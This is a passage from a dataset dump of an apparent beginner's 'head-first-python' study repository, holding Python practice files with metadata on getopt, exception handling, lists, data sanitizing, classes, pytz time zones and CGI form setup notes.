"text": "# getopt - C-style parser for command line options.\n\n# this module helps scripts to parse the command line arguments in sys.argv.\n\n# This module provides two functions and an exception:\n# \tgetopt.getopt(args, shortopts, longopts=[])\n\n\"\"\"\nargs is the argument list to be parsed, without the leading reference to the runnig program.\nTypically, this means sys.argv[1:]. shortopts is the string of option letters that the script wants to recognize,\nwith options that require an argument followed by a colon.\n\nlongopts, if specified, must be a list of strings with the names of the long options which should be supported.\nThe leading '--' characters should not be included in the option name. Long options which require an argument should be followed by an equal sign ('=').\nOptional arguments are not supported.\n\nThe return value consists of two elements: \n\tthe first is a list of (option, value) pairs;\n\tthe second is the list of program arguments left after the option list was stripped (this is a trailing slice of args).\nEach option-and-value pair returned has the option as its first element,\nprefixed with a hyphen for short options (e.g., '-x') or two hyphens for long options (e.g., '--long-option'),\nand the option argument as its second element, or an empty string if the option has no argument.\nThe options occur in the list in the same order in which they were found, thus allowing multiple occurrences.\nLong and short options may be mixed.00\n\"\"\"\n\n# \tgetopt.gnu_getopt(args, shortopts, longopts=[])\n# This function works like getopt(), except that GNU style scanning mode is used by default.\n\n# exception:\n# \tgetopt.GetoptError\n# \t- This is raised when an unrecognized option is found in the argument list or when an option requiring an argument is given none.\n# \tgetopt.error\n# \t- Alias for GetoptError;\n\n# ------------------------------------------------------------------------------------------------------------------------------------------------------\n\n# First Error Point. Not executed.\n# Because,\n# You might be have getopt module in your code.\n# When you refere python third party module, it try to import your module.\n\n# this is typical usage script.\nimport getopt, sys\n\ndef main():\n\ttry:\n\t\topts, args = getopt.getopt(sys.argv[1:], \"ho:v\", [\"help\", \"output=\"])\n\texcept getopt.GetoptError as err:\n\t\tprint(err)\n\t\tusage()\n\t\tsys.exit(2)\n\toutput = None\n\tverbose = False\n\tfor o, a in opts:\n\t\tif o == \"-v\":\n\t\t\tverbose = True\n\t\telif o in (\"-h\", \"--help\"):\n\t\t\tusage()\n\t\t\tsys.exit()\n\t\telif o in (\"-o\", \"--output\"):\n\t\t\toutput = a\n\t\telse:\n\t\t\tassert False, \"unhandled option\"\n\nif __name__ == \"__main__\":\n\tmain()\n\n### 한글 추가\n### 옵션 문자에 :가 사용되면 옵션에 추가의 인수를 받아들인다는 의미!\n### abc:de:\n### 라면 a,b,d 는 단독옵션이고, c,e 는 인수를 갖는 옵션이다.\n\n"
},
{
"alpha_fraction": 0.6648721694946289,
"alphanum_fraction": 0.6672947406768799,
"avg_line_length": 23.11688232421875,
"blob_id": "2b0df77055d053188a976e2d4ef457d6817c59df",
"content_id": "825e7e0748c939c352293fa8f7450501564bbb66",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3715,
"license_type": "no_license",
"max_line_length": 131,
"num_lines": 154,
"path": "/03-errors/errors.py",
"repo_name": "flyingbest/head-first-python",
"src_encoding": "UTF-8",
"text": "# Dealing with errors\n\n# It's all lines of text\n\"\"\"\nThe basic input mechanism in Python is line based:\nwhen read into your program from a text file, data arrives one line at a time.\n\nPython's open() BIF lives to interact with files. When combined with a for statement, reading files is straightforward.\n\"\"\"\n\nthe_file = open('sketch.txt')\n# Do something with the data\n# in \"the_file\".\n\n\"\"\"\nfor each_line in the_file:\n\t(role, line_spoken) = each_line.split(':')\n\tprint(role, end='')\n\tprint(' said: ', end='')\n\tprint(line_spoken, end='')\n\"\"\"\n\n# error : too many values to unpack\n# Know your methods and ask for help\n\"\"\"\nIt might be useful to see if the split() method includes any functionality that might help here.\nYou can ask the IDLE shell to tell you more about the spilt() method by using the help() BIF.\n\"\"\"\n\n\"\"\"\nfor each_line in the_file:\n\t(role, line_spoken) = each_line.split(':', 1)\n\tprint(role, end='')\n\tprint(' said: ', end='')\n\tprint(line_spoken, end='')\n\"\"\"\n\n# Add extra logic\n\ndata = \"I tell you, there's no such thing as a flying circus.\"\nprint(data.find(':'))\n# the string does NOT contain a colon, so find() returns -1 for NOT FOUND.\n\n\"\"\"\nfor each_line in the_file:\n\tif not each_line.find(':') == -1:\n\t\t(role, line_spoken) = each_line.split(':', 1)\n\t\tprint(role, end='')\n\t\tprint(' said: ', end='')\n\t\tprint(line_spoken, end='')\n\"\"\"\n\n\n# Handle exceptions\n\"\"\"\nThe traceback is Python's way of telling you that something unexpected has occurred during runtime.\nIn the Python world, runtime errors are called exceptions.\n\"\"\"\n\n# The try/except mechanism\n\"\"\"\nPython includes the try statement, which exist to provide you with a way to systematically handle exceptions and errors at runtime.\nThe general form of the try statement looks like this:\n\"\"\"\n\n# try :\n#\t\t\t\tyour code (which might cause a runtime error)\n# except:\n# \t\t\tyour error-recovery code\n\n\"\"\"\nfor each_line in the_file:\n\ttry:\n\t\t(role, line_spoken) = each_line.split(':', 1)\n\t\tprint(role, end='')\n\t\tprint(' said: ', end='')\n\t\tprint(line_spoken, end='')\n\texcept:\n\t\tpass\t# if a runtime error occurs, this code is executed.\n\"\"\"\n\n# Which is better? Extra code, Exception handler\n\n\n# What about other errors?\n# Handling missing files\n\n\"\"\"\n#import os\n#if os.path.exist('/sketch.txt'):\n#\tthe_file = open('sketch.txt')\n\n\tfor each_line in the_file:\n\t\tif not each_line.find(':') == -1:\n\t\t\t(role, line_spoken) = each_line.split(':', 1)\n\t\t\tprint(role, end='')\n\t\t\tprint(' said: ', end='')\n\t\t\tprint(line_spoken, end='')\n\t\n#\tthe_file.close()\n#else:\n#\tprint('The data file is missing!')\n\"\"\"\n\n\"\"\"\n#try:\n#\tthe_file = open('sketch.txt')\n\n\tfor each_line in the_file:\n\t\ttry:\n\t\t\t(role, line_spoken) = each_line.split(':', 1)\n\t\t\tprint(role, end='')\n\t\t\tprint(' said: ', end='')\n\t\t\tprint(line_spoken, end='')\n\t\texcept:\n\t\t\tpass\n\n#\tthe_file.close()\n#except:\n#\tprint('The data file is missing!')\n\"\"\"\n\n# So, which approach is best? fiist one or second one?\n\n# Complexity is rarely a good thing\n\"\"\"\nBy using Python's exception-handling mechanism, you get to concentrate on what your code needs to do,\nas opposed to worrying about what can go wrong and writing extra code to avoid runtime errors.\n\"\"\"\n\n# Last, You need to somehow use except in a less generic way.\n\n\"\"\"\n#try:\n#\tthe_file = open('sketch.txt')\n\n\tfor each_line in the_file:\n\t\ttry:\n\t\t\t(role, line_spoken) = each_line.split(':', 1)\n\t\t\tprint(role, end='')\n\t\t\tprint(' said: ', end='')\n\t\t\tprint(line_spoken, end='')\n\t\texcept ValueError:\n\t\t\tpass\n\n#\tthe_file.close()\n#except IOError:\n#\tprint('The data file is missing!')\n\"\"\"\n# Be specific with your exceptions\n# If your exception-handling code is designed to deal with a specific type of error,\n# be sure to specific the error type on the except line.\n\nthe_file.close()\n\n"
},
{
"alpha_fraction": 0.6724057793617249,
"alphanum_fraction": 0.6849697828292847,
"avg_line_length": 22.615385055541992,
"blob_id": "b03c4a60357effa277cf5f32260e4460992b72dd",
"content_id": "4e0825419b336370b64bdfd5ad3a5bfe8dee247f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2149,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 91,
"path": "/01-lists/lists.py",
"repo_name": "flyingbest/head-first-python",
"src_encoding": "UTF-8",
"text": "# This is python practicing code.\n\n## Add more data in the list.\ncast = [\"Cleese\", \"Palin\", \"Jones\", \"Idle\"]\t# cast is variable.\nprint(cast)\nprint(len(cast))\t# len = length\nprint(cast[1])\t# cast[0] = Cleese, cast[1] = Palin, like this, python starts counting from ZERO.\n\ncast.append(\"Gilliam\")\t# add a single data item to the end of your list.\nprint(cast)\n\ncast.pop()\t# remove data from the end of your list.\nprint(cast)\n\ncast.extend([\"Gilliam\", \"Chapman\"])\t# add a collection of data items to the end of your list.\nprint(cast)\n\ncast.remove(\"Chapman\")\t# remove a specific data item from your list.\nprint(cast)\n\ncast.insert(0, \"Chapman\")\t# add a data item before a specific slot location.\nprint(cast)\n\nmovies = [\"The Holy Grail\", \"The Life of Brain\", \"The Meaning of Life\"]\nprint(movies)\n\nmovies.insert(1, 1975)\nmovies.insert(3, 1979)\nmovies.insert(5, 1983)\n\nprint(movies)\n\n\n## iterate with the list data.\nfav_movies = [\"Holy Grail\", \"Life of Brain\"]\n\nfor each_flick in fav_movies:\t# each_flick is a target identifier\n\tprint(each_flick)\n\n# for <target identifier> in <list>:\n#\t\t<list-processing code...>\n\ncount = 0\nwhile count < len(fav_movies):\n\tprint(fav_movies[count])\n\tcount = count + 1\n# these while and for statements do the same thing.\n\n\n## handle many levels of nested lists.\nmovies = [\"The Holy Grail\", 1975, \"Terry Jones & Terry Gilliam\", 91,\n\t\t\t\t\t\t[\"Graham Chapman\", [\"Michael Palin\", \"John Cleese\", \"Terry Gilliam\", \"Eric Idle\", \"Terry Jones\"]]]\n\nprint(movies)\n\n# first step\nfor each_item in movies:\n\tprint(each_item)\n\n# second step\nfor each_item in movies:\n\tif isinstance(each_item, list):\n\t\tfor nested_item in each_item:\n\t\t\tprint(nested_item)\n\telse:\n\t\tprint(each_item)\n\n# third step\nfor each_item in movies:\n\tif isinstance(each_item, list):\n\t\tfor nested_item in each_item:\n\t\t\tif isinstance(nested_item, list):\n\t\t\t\tfor deeper_item in nested_item:\n\t\t\t\t\tprint(deeper_item)\n\t\t\telse:\n\t\t\t\tprint(nested_item)\n\telse:\n\t\tprint(each_item)\n\n\n## Don't repeat code: create a function\ndef print_lol(the_list):\n\tfor each_item in the_list:\n\t\tif isinstance(each_item, list):\n\t\t\tprint_lol(each_item)\n\t\telse:\n\t\t\tprint(each_item)\n# this called Recursion.\n# this is recursive function.\n\nprint_lol(movies)\n"
},
{
"alpha_fraction": 0.6951034665107727,
"alphanum_fraction": 0.7083964347839355,
"avg_line_length": 25.765766143798828,
"blob_id": "602e05c834783a16da71e3167f7da263dfec98a6",
"content_id": "bf937c42b35ce25241a3f5503762558656e054ef",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5943,
"license_type": "no_license",
"max_line_length": 152,
"num_lines": 222,
"path": "/05-data/data.py",
"repo_name": "flyingbest/head-first-python",
"src_encoding": "UTF-8",
"text": "# Work that data\n\nwith open('james.txt') as jaf:\n\tdata = jaf.readline()\njames = data.strip().split(',')\n\nwith open('julie.txt') as juf:\n\tdata = juf.readline()\njulie = data.strip().split(',')\n\nwith open('mikey.txt') as mif:\n\tdata = mif.readline()\nmikey = data.strip().split(',')\n\nwith open('sarah.txt') as saf:\n\tdata = saf.readline()\nsarah = data.strip().split(',')\n\n\"\"\"\nprint(james)\nprint(julie)\nprint(mikey)\nprint(sarah)\n\"\"\"\n\n\n# Sort in one of two ways\n\"\"\"\nIn-place sorting takes your data, arranges it in the order you specify, and then replaces your original data with the sorted version.\nThe original ordering is lost. With lists, the sort() method provides in-place sorting:\n\nCopied sorting takes your data, arranges it in the order you specify, and then returns a sorted copy of your original data.\nYour original data's ordering is maintained and only the copy is sorted. In Python, the sorted() BIF supports copied sorting.\n\"\"\"\n\n\"\"\"\ndata = [6,3,1,2,4,5]\nprint(data)\n\ndata.sort()\nprint(data)\n\ndata1 = [6,3,1,2,4,5]\nprint(data1)\n\ndata2 = sorted(data1)\nprint(data1)\nprint(data2)\n\"\"\"\n\n\"\"\"\nprint(sorted(james))\nprint(sorted(julie))\nprint(sorted(mikey))\nprint(sorted(sarah))\n\"\"\"\n\n# Nonuniformity in the coach's data is causing the sort to fail.\n\ndef sanitize(time_string):\n\tif '-' in time_string:\n\t\tsplitter = '-'\n\telif ':' in time_string:\n\t\tsplitter = ':'\n\telse:\n\t\treturn(time_string)\n\t(mins, secs) = time_string.split(splitter)\n\n\treturn(mins + '.' + secs)\n\nclean_james = []\nclean_julie = []\nclean_mikey = []\nclean_sarah = []\n\nfor each_t in james:\n\tclean_james.append(sanitize(each_t))\n\nfor each_t in julie:\n\tclean_julie.append(sanitize(each_t))\n\nfor each_t in mikey:\n\tclean_mikey.append(sanitize(each_t))\n\nfor each_t in sarah:\n\tclean_sarah.append(sanitize(each_t))\n\n\"\"\"\nprint(sorted(clean_james))\nprint(sorted(clean_julie))\nprint(sorted(clean_mikey))\nprint(sorted(clean_sarah))\n\"\"\"\n\n# By default, both the sort() method and the sorted() BIF order your data in ascending order.\n# To order your data in descending order, pass the reverse=True argument to either sort() or sorted() and Python will take care of things for you.\n\n# Duplicated code is problem. -> better way to write code (list comprehension)\n\n# Comprehending lists\n\"\"\"\nConsider what you need to do when you transform one list into another. Four things have to happen. You need to:\n\t1. create a new list to hold the transformed data.\n\t2. iterate each data item in the original list.\n\t3. with each iteration, perform the transformation.\n\t4. append the transformed data to the new list.\n\nHere's the same functionality as a list comprehension, which involves creating a new list by specifying the transformation that is to be applied to each\nof the data items within an existing list.\n\nclean_mikey = [sanitize(each_t) for each_t in mikey]\n\nwhat's interesting is that the transformation has been reduced to a single line of code.\nAdditionally, there's no need to specify the use of the append() method as this action is implied within the list comprehension.\n\"\"\"\n\nmins = [1,2,3]\nsecs = [m*60 for m in mins]\nprint(secs)\n\nmeter = [1,10,3]\nfeet = [m*3.281 for m in meter]\nprint(feet)\n\nlower = [\"I\", \"don't\", \"like\", \"spam\"]\nupper = [s.upper() for s in lower]\nprint(upper)\n\ndirty = ['2-22', '2:22', '2.22']\nclean = [sanitize(t) for t in dirty]\nprint(clean)\n\nclean = [float(s) for s in clean]\nprint(clean)\n\nclean = [float(sanitize(t)) for t in ['2-22', '3:33', '4.44']]\nprint(clean)\n\n\"\"\"\nprint(sorted([sanitize(t) for t in james]))\nprint(sorted([sanitize(t) for t in julie]))\nprint(sorted([sanitize(t) for t in mikey]))\nprint(sorted([sanitize(t) for t in sarah]))\n\"\"\"\n\n# Iterate to remove duplicates\n# list slice:\n\n\"\"\"\njames = sorted([sanitize(t) for t in james])\njulie = sorted([sanitize(t) for t in julie])\nmikey = sorted([sanitize(t) for t in mikey])\nsarah = sorted([sanitize(t) for t in sarah])\n\nunique_james = []\nfor each_t in james:\n\tif each_t not in unique_james:\n\t\tunique_james.append(each_t)\n\nprint(unique_james[0:3])\n\nunique_julie = []\nfor each_t in julie:\n\tif each_t not in unique_julie:\n\t\tunique_julie.append(each_t)\n\nprint(unique_julie[0:3])\n\nunique_mikey = []\nfor each_t in mikey:\n\tif each_t not in unique_mikey:\n\t\tunique_mikey.append(each_t)\n\nprint(unique_mikey[0:3])\n\nunique_sarah = []\nfor each_t in sarah:\n\tif each_t not in unique_sarah:\n\t\tunique_sarah.append(each_t)\n\nprint(unique_sarah[0:3])\n\"\"\"\n\n\n# Remove duplicates with sets\n\"\"\"\nIn addition to lists, Python also comes with the set data structure, which behaves like the sets you learned all about in math class.\nThe overriding characteristics of sets in Python are that the data items in a set are unordered and duplicates are not allowed.\nIf you try to add a data item to a set that already contains the data item, Python simply ignores it.\nCreate an empty set using the set() BIF, which is an example of a factory function:\n\tdistances = set()\nIt is also possible to create and populate a set in one step. You can provide a list of data values between curly braces or specify an existing list\nas an argument to the set() BIF, which is the factory function:\n\tdistances = {10.6, 11, 8, 10.6, \"two\", 7}\n\tdistances = set(james)\n\n\"\"\"\n\ndef get_coach_data(filename):\n\ttry:\n\t\twith open(filename) as f:\n\t\t\tdata = f.readline()\n\t\treturn(data.strip().split(','))\n\texcept IOError as ioerr:\n\t\tprint('File error: ' + str(ioerr))\n\t\treturn(None)\n\nsarah = get_coach_data('sarah.txt')\n\nprint(sorted(set([sanitize(t) for t in james]))[0:3])\nprint(sorted(set([sanitize(t) for t in julie]))[0:3])\nprint(sorted(set([sanitize(t) for t in mikey]))[0:3])\nprint(sorted(set([sanitize(t) for t in sarah]))[0:3])\n\n\n# Python Lingo\n\"\"\"\nMethod Chaining - reading from left to right, applies a collection of methods to data.\nFunction Chaining - reading from right to left, applies a collection of functions to data.\nA 'slice' - access more than one item from a list.\nA 'set' - a collection of unordered data items that contains no duplicates.\n\"\"\"\n\n"
},
{
"alpha_fraction": 0.7139272093772888,
"alphanum_fraction": 0.7239648699760437,
"avg_line_length": 23.90625,
"blob_id": "359cde43e6ddd16df9c99c0ce61ad175c79c61ae",
"content_id": "b9b7c2100103a0adf85032f53327cc7349637a74",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 797,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 32,
"path": "/09-handle/handle.py",
"repo_name": "flyingbest/head-first-python",
"src_encoding": "UTF-8",
"text": "# Handling input\n\n# Create an HTML form template\n\"\"\"\ncreating file:\n\ttemplates/form.html\n\tcgi-bin/process-time.py\t\t\t//cgi script chmod +x\t\t//no need to.\n\nwrite the code for two func to add to yate.py\n\tcreate_inputs()\n\tdo_form()\t\n\ncreating file:\n\tcgi-bin/test_form.py\t\t\t//cgi script chmod +x\n\nEnter the URL for the CGI script :\n\thttp://localhost:8080/cgi-bin/test_form.py\n\"\"\"\n\n# The data is delivered to your CGI script\n\"\"\"\ncreating file:\n\tnew CGI script called add_timing_data.py\t\t//cgi script chmod +x\n\nEnter the URL for the CGI script :\n\thttp://localhost:8080/cgi-bin/test_form.py\n\nInput some data into your web form. And check the web browser.\nThe web server's logging screen displays the data that arrived, as well as the name associated with it. \n\"\"\"\n\n# Next, experience on an Android phone.\n"
},
{
"alpha_fraction": 0.7255772352218628,
"alphanum_fraction": 0.7255772352218628,
"avg_line_length": 19.851852416992188,
"blob_id": "270b5ba909adf0360ffe0fb9e8c7789e3831950e",
"content_id": "4d1669d53f9aef8e7d9ce36f2b5a41d992dc2b12",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1202,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 54,
"path": "/tutorial/datetime-tutorial.py",
"repo_name": "flyingbest/head-first-python",
"src_encoding": "UTF-8",
"text": "# basic datetime\n\nimport datetime\n\"\"\"\nCurrentDate = datetime.date.today()\nprint(datetime.date.today())\nprint(CurrentDate)\nprint(datetime.date)\n\nprint(CurrentDate.year)\nprint(CurrentDate.month)\nprint(CurrentDate.day)\n\"\"\"\n\n# advanced datetime \n\nimport pytz\n\n# all_timezones -> all timezone list. \nfor tz in pytz.all_timezones:\n\tif \"Asia/Seoul\" in tz:\n\t\tprint(tz)\n\n# all_timezones_set -> all timezone set.\nfor tz in pytz.all_timezones_set:\n\tif \"Asia/Seoul\" in tz:\n\t\tprint(tz)\n\n# 국가코드로 국가이름, 타임존 조회\nprint(pytz.country_names['KR'])\nprint(pytz.country_timezones('KR'))\nprint(pytz.country_names['US'])\nprint(pytz.country_timezones('US'))\n\n# 타임존 으로 하나의 타임존 인스턴스를 생성하는 함수\nfor tzs in pytz.all_timezones:\n\tif 'Asia/Seoul' in tzs:\n\t\ttzs_seoul = tzs\n\t\tbreak\n\na = pytz.timezone(tzs_seoul)\nprint(type(a))\nprint(a)\n\n# UTC 적용(pytz.UTC)\nprint(type(pytz.UTC))\nprint(pytz.UTC.__class__.__class__)\nprint(pytz.UTC.dst(datetime.datetime.today()))\nprint(pytz.UTC.localize(datetime.datetime.today()))\nprint(pytz.UTC.tzname(datetime.datetime.today()))\nprint(pytz.UTC.utcoffset(datetime.datetime.today()))\nprint(pytz.UTC.zone)\n\n# more about slideshare.\n"
},
{
"alpha_fraction": 0.7704917788505554,
"alphanum_fraction": 0.7745901346206665,
"avg_line_length": 29.5,
"blob_id": "2a2fcc50dacc8870178a988f74351eb8e9934fb8",
"content_id": "dc9b5dfb7b7e80ffb50a04e421b2300876e3f66a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 244,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 8,
"path": "/tutorial/README.md",
"repo_name": "flyingbest/head-first-python",
"src_encoding": "UTF-8",
"text": "# Python3 tutorials.\n\nThis repository is what I needed for teaching my friend.\n\n### command-line options, arguments\n\nAfter testing, my friend need simple command-line arguments. not getopt and argparse. \nMake a basic form of driver.py script.\n"
},
{
"alpha_fraction": 0.6693425178527832,
"alphanum_fraction": 0.6795361638069153,
"avg_line_length": 25.600000381469727,
"blob_id": "8c57c6516386bd20674bb4b77ff1a844f6efa9e7",
"content_id": "809b106a24e0004aaae219f54a7bda76fc793f00",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7848,
"license_type": "no_license",
"max_line_length": 153,
"num_lines": 295,
"path": "/06-bundle/bundle.py",
"repo_name": "flyingbest/head-first-python",
"src_encoding": "UTF-8",
"text": "# Bundling code with data\n\ndef sanitize(time_string):\n\tif '-' in time_string:\n\t\tsplitter = '-'\n\telif ':' in time_string:\n\t\tsplitter = ':'\n\telse:\n\t\treturn(time_string)\n\n\t(mins, secs) = time_string.split(splitter)\n\treturn(mins + '.' + secs)\n\n\"\"\"\ndef get_coach_data(filename):\n\ttry:\n\t\twith open(filename) as f:\n\t\t\tdata = f.readline()\n\t\treturn(data.strip().split(','))\n\texcept IOError as ioerr:\n\t\tprint('File error: ' + str(ioerr))\n\t\treturn(None)\n\"\"\"\n\n\"\"\"\nsarah = get_coach_data('sarah2.txt')\n(sarah_name, sarah_dob) = sarah.pop(0), sarah.pop(0)\nprint(sarah_name + \"'s fastest time are: \" + str(sorted(set([sanitize(t) for t in sarah]))[0:3]))\n\"\"\"\n\n# this code is for loop for print.\nsample = ['james2.txt', 'julie2.txt', 'mikey2.txt', 'sarah2.txt']\n\n\"\"\"\nfor each_item in sample:\n\tarr = get_coach_data(each_item)\n\t(arr_name, arr_dob) = arr.pop(0), arr.pop(0)\n\tprint(arr_name + \"'s fastest time are: \" + str(sorted(set([sanitize(t) for t in arr]))[0:3]))\n\"\"\"\n\n\n# Use a dictionary to associate data\n\"\"\"\nDictionary A built-in data structure (included with Python) that allows you to associate data with keys, as opposed to numbers.\nThis lets your in-memory data closely match the structure of your actual data.\n\"\"\"\n\n\"\"\"\ncleese = {}\npalin = dict()\nprint(type(cleese))\nprint(type(palin))\n\ncleese['Name'] = 'John Cleese'\ncleese['Occupations'] = ['actor', 'comedian', 'writer', 'film producer']\npalin = {'Name': 'Michael Palin', 'Occupations': ['comedian', 'actor', 'writer', 'tv']}\n\nprint(palin['Name'])\nprint(palin['Occupations'][-1])\t\t# tv\nprint(cleese['Occupations'][-1])\t# film producer\n\n# provide the data asociated with the new key.\npalin['Birthplace'] = \"Broomhill, Sheffield, England\"\ncleese['Birthplace'] = \"Weston-super-Mare, North Somerset, England\"\n\nprint(palin)\nprint(cleese)\n\"\"\"\n\n# Unlike lists, a Python dictionary does not maintain insertion order, which can result in some unexpected behavior.\n# The key point is that the dictionary maintains the associations, not the ordering.\n\n\"\"\"\nfor each_item in sample:\n\tarr = get_coach_data(each_item)\n\tarr_data = {}\n\tarr_data['Name'] = arr.pop(0)\n\tarr_data['DOB'] = arr.pop(0)\n\tarr_data['Times'] = arr\n\tprint(arr_data['Name'] + \"'s fastest times are: \" + str(sorted(set([sanitize(t) for t in arr_data['Times']]))[0:3]))\n\"\"\"\n\n# improve get_coach_data function\n\n\"\"\"\ndef get_coach_data(filename):\n\ttry:\n\t\twith open(filename) as f:\n\t\t\tdata = f.readline()\n\t\ttempl = data.strip().split(',')\n\t\treturn({'Name'\t:\ttempl.pop(0),\n\t\t\t\t\t\t'DOB'\t\t: templ.pop(0),\n\t\t\t\t\t\t'Times'\t: str(sorted(set([sanitize(t) for t in templ]))[0:3])})\n\texcept IOError as ioerr:\n\t\tprint('File error: ' + str(ioerr))\n\t\treturn(None)\n\nfor each_item in sample:\n\tarr = get_coach_data(each_item)\n\tprint(arr['Name'] + \"'s fastest times are: \" + arr['Times'])\n\"\"\"\n\n\n# Bundle your code and its data in a class\n\"\"\"\nLike the majority of other modern programming languages, Python lets you create and define an object-oriented class\nthat can be used to asscociate code with the data that it operates on.\n\nUsing a class helps reduce complexity.\nReduced complexity means fewer bugs.\nFewer bugs means more maintainable code.\n\"\"\"\n\n# Define a class\n\"\"\"\nOnce this definition is in place, you can use it to create (or instantiate) data objects, which inherit their characteristics from your class.\nWithin the object-oriented world, your code is often referred to as the class's methods, and your data is often referred to as its attributes.\nInstantiated data objects are often referred to as instance.\n\"\"\"\n\n# Use class to define classes\n\"\"\"\nPython uses class to create objects. Every defined class has a special method called __init__(), which allows you to control how objects are initialized.\nHere's the basic form:\n\"\"\"\n# class Athlete:\n# \tdef __init__(self):\n#\t\t\t# The code to initialize an \"Athlete\" object.\n#\t\t\t\t...\n\n# Creating object instances\n# a = Athlete()\n# b = Athlete()\n\n# The importance of self\n\"\"\"\nTo confirm: when you define a class you are, in effect, defining a custom factory function that you can then use in your code to create instance:\n# a = Athlete()\n\nWhen Python processes this line of code, it turns the factory function call into the following call, which identifies the class, the method\n( which is automatically set to __init__() ) and the object instance being operated on:\n# Athlete.__init__(a) //a is the target identifier of the object instance.\n\nNow take another look at how the __init__() method was defined in the class:\n# def __init__(self):\n#\t\t# The code initialize an \"Athlete\" object.\n#\t\t\t...\n\"\"\"\n# The target identifier is assigned to the self argument.\n\"\"\"\nThis is a very important argument assignment. Without it, the Python interpreter can't work out which object instance to apply the method invocation to.\nNote that the class code is designed to be shared among all of the object instances:\nthe methods are shared, the attributes are NOT. The self argument helps identify which object instance's data to work on.\n\"\"\"\n\n# Every method's first argument is self\n\"\"\"\nclass Athlete:\n\tdef __init__(self, value=0):\n\t\tself.thing = value\n\tdef how_big(self):\n\t\treturn(len(self.thing))\n\nd = Athlete(\"Holy Grail.\")\nprint(d.how_big())\n\na = Athlete(\"\")\nprint(a.how_big())\n\"\"\"\n\n\"\"\"\nclass Athlete:\n\tdef __init__(self, a_name, a_dob=None, a_times=[]):\n\t\tself.name = a_name\n\t\tself.dob = a_dob\n\t\tself.times = a_times\n\nsarah = Athlete('Sarah Sweeney', '2002-6-17', ['2:58', '2.58', '1.56'])\njames = Athlete('James Jones')\n\nprint(type(sarah))\nprint(type(james))\n\nprint(sarah)\nprint(james)\n\nprint(sarah.name)\nprint(james.name)\nprint(sarah.dob)\nprint(james.dob)\nprint(sarah.times)\nprint(james.times)\n\"\"\"\n\n# improve get_coach_data function\n\n\"\"\"\nclass Athlete:\n\tdef __init__(self, a_name, a_dob=None, a_times=[]):\n\t\tself.name = a_name\n\t\tself.dob = a_dob\n\t\tself.times = a_times\n\n\tdef top3(self):\n\t\treturn(sorted(set([sanitize(t) for t in self.times]))[0:3])\n\n# add Athlete class def\n\tdef add_time(self, time_value):\n\t\tself.times.append(time_value)\n\n\tdef add_times(self, list_of_times):\n\t\tself.times.extend(list_of_times)\n\ndef get_coach_data(filename):\n\ttry:\n\t\twith open(filename) as f:\n\t\t\tdata = f.readline()\n\t\ttempl = data.strip().split(',')\n\t\treturn Athlete(templ.pop(0), templ.pop(0), templ)\n\texcept IOError as ioerr:\n\t\tprint('File error: ' + str(ioerr))\n\t\treturn(None)\n\nfor each_item in sample:\n\tarr = get_coach_data(each_item)\n\tprint(arr.name + \"'s fastest times are: \" + str(arr.top3()))\n\"\"\"\n\n# create a new object instance for Vera.\n\n\"\"\"\nvera = Athlete('Vera Vi')\nvera.add_time('1.31')\nprint(vera.top3())\nvera.add_times(['2.22', \"1-21\", '2:22'])\nprint(vera.top3())\n\"\"\"\n\n\n# Inherit from Python's built-in list\n\n\"\"\"\nclass NamedList(list):\n\tdef __init__(self, a_name):\n\t\tlist.__init__([])\n\t\tself.name = a_name\n\njohnny = NamedList(\"John Paul Jones\")\nprint(type(johnny))\nprint(dir(johnny))\n\njohnny.append(\"Bass Player\")\nprint(johnny)\njohnny.extend(['Composer', \"Arranger\", \"Musician\"])\nprint(johnny)\n\nprint(johnny.name)\n\nfor attr in johnny:\n\tprint(johnny.name + \" is a \" + attr + \".\")\n\"\"\"\n\n# improve Athlete class\n\nclass AthleteList(list):\n\tdef __init__(self, a_name, a_dob=None, a_times=[]):\n\t\tlist.__init__([])\n\t\tself.name = a_name\n\t\tself.dob = a_dob\n\t\tself.extend(a_times)\n\n\tdef top3(self):\n\t\treturn(sorted(set([sanitize(t) for t in self]))[0:3])\n\ndef get_coach_data(filename):\n\ttry:\n\t\twith open(filename) as f:\n\t\t\tdata = f.readline()\n\t\ttempl = data.strip().split(',')\n\t\treturn(AthleteList(templ.pop(0), templ.pop(0), templ))\t# Athlete -> AthleteList change\n\texcept IOError as ioerr:\n\t\tprint('File error: ' + str(ioerr))\n\t\treturn(None)\n\nvera = AthleteList('Vera Vi')\nvera.append('1.31')\nprint(vera.top3())\nvera.extend(['2.22', \"1-21\", '2:22'])\nprint(vera.top3())\n\nfor each_item in sample:\n\tarr = get_coach_data(each_item)\n\tprint(arr.name + \"'s fastest times are: \" + str(arr.top3()))\n\n# 'self' - a method argument that always refers to the current object instance.\n\n"
},
{
"alpha_fraction": 0.7521079182624817,
"alphanum_fraction": 0.7588533163070679,
"avg_line_length": 33.882354736328125,
"blob_id": "ba3a75fbd92a8651687982dc588c6f4226399601",
"content_id": "0b53a7703273dd157a5743514f849d20a775e9c0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 593,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 17,
"path": "/08-devices/mobile.py",
"repo_name": "flyingbest/head-first-python",
"src_encoding": "UTF-8",
"text": "# Small devices\n\n# The world is getting samller\n# there's more than just desktop computers out there.\n\n# A quick search of the Web uncovers a pleasent surprise: Python runs on Android.\n# At least a version of Python runs on Android. A project called Scripting Layer for Android(SL4A) provides technology to let you\n# run Python on any Android device. But there's a catch.\n\n# Yes. SL4A ships with Python 2, not 3.\n\n# Set up your deveopment environment\n\n# Download the Software Development Kit (SDK)\n\n# Go home computer, Do it when you complete the download the SDK.\n# Not on linux. on windows.\n"
},
{
"alpha_fraction": 0.6014670133590698,
"alphanum_fraction": 0.621026873588562,
